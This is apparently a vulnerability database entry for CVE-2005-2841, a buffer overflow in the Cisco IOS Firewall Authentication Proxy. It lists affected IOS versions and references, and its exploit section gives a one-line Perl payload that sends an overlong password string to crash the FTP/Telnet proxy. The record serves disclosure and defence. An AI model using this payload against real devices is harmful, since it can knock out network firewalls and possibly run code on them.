ID

VAR-E-200509-0195


CVE

cve_id:CVE-2005-2841

Trust: 1.6

sources: EXPLOIT-DB: 26233 // EDBNET: 48220

EDB ID

26233


TITLE

Cisco IOS 12.x - Firewall Authentication Proxy Buffer Overflow - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 26233

DESCRIPTION

Cisco IOS 12.x - Firewall Authentication Proxy Buffer Overflow. CVE-2005-2841CVE-19227 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 26233

AFFECTED PRODUCTS

vendor:ciscomodel:ios 12.3scope:neversion: -

Trust: 2.1

vendor:ciscomodel:iosscope:eqversion:12.x

Trust: 1.0

vendor:ciscomodel:ios 12.4tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.4mrscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.4

Trust: 0.3

vendor:ciscomodel:ios 12.3ywscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3yuscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3ytscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3ysscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3yqscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3ykscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3yjscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3yiscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3ygscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3yfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3ydscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3yascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xyscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xwscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xuscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xsscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xrscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xqscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xmscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xlscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xkscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xjscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xiscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xhscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xgscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xescope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xdscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xbscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3xascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3tscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3jkscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3jascope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3bwscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3bcscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.3bscope: - version: -

Trust: 0.3

vendor:ciscomodel:iosscope:eqversion:12.3

Trust: 0.3

vendor:ciscomodel:ios 12.2zlscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2zfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2sxfscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2shscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2sgscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.2secscope: - version: -

Trust: 0.3

vendor:ciscomodel:ios 12.4 tscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.4 mrscope:neversion: -

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.4(1)

Trust: 0.3

vendor:ciscomodel:ios 12.3 bc7scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 yi1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 yg2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 t9scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 xr4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 xi4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 t10scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 jascope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 xk4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 xg5scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 xe4scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 xc3scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 xa5scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 jkscope:neversion: -

Trust: 0.3

vendor:ciscomodel:iosscope:neversion:12.3(15)

Trust: 0.3

vendor:ciscomodel:ios 12.3 yuscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 ytscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 yqscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 t2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 ywscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 ysscope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 yk1scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 yf2scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 xl3scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.3 t6scope:neversion: -

Trust: 0.3

vendor:ciscomodel:ios 12.2 zh8scope:neversion: -

Trust: 0.3

sources: BID: 14770 // EXPLOIT-DB: 26233

EXPLOIT

source: https://www.securityfocus.com/bid/14770/info

Cisco IOS Firewall Authentication Proxy is prone to a buffer overflow condition. Successful exploitation of this issue could cause a denial of service or potential execution of arbitrary code.

This issue affects the FTP and Telnet protocols, but not HTTP.

perl -e 'print "pass "; print "A" x 51; print "@ \n";'

Trust: 1.0

sources: EXPLOIT-DB: 26233

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 26233

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 26233

TYPE

Firewall Authentication Proxy Buffer Overflow

Trust: 1.0

sources: EXPLOIT-DB: 26233

CREDITS

Markus

Trust: 0.6

sources: EXPLOIT-DB: 26233

EXTERNAL IDS

db:BIDid:14770

Trust: 1.9

db:NVDid:CVE-2005-2841

Trust: 1.6

db:EXPLOIT-DBid:26233

Trust: 1.6

db:EDBNETid:48220

Trust: 0.6

sources: BID: 14770 // EXPLOIT-DB: 26233 // EDBNET: 48220

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2005-2841

Trust: 1.6

url:https://www.securityfocus.com/bid/14770/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/26233/

Trust: 0.6

url:http://www.cisco.com/warp/public/707/cisco-sa-20050907-auth_proxy.shtml

Trust: 0.3

url:http://lists.darklab.org/pipermail/darklab/2005-october/000068.html

Trust: 0.3

url:http://www.cisco.com/public/sw-center/sw-ios.shtml

Trust: 0.3

sources: BID: 14770 // EXPLOIT-DB: 26233 // EDBNET: 48220

SOURCES

db:BIDid:14770
db:EXPLOIT-DBid:26233
db:EDBNETid:48220

LAST UPDATE DATE

2022-07-27T09:14:14.787000+00:00


SOURCES UPDATE DATE

db:BIDid:14770date:2005-09-07T00:00:00

SOURCES RELEASE DATE

db:BIDid:14770date:2005-09-07T00:00:00
db:EXPLOIT-DBid:26233date:2005-09-07T00:00:00
db:EDBNETid:48220date:2005-09-07T00:00:00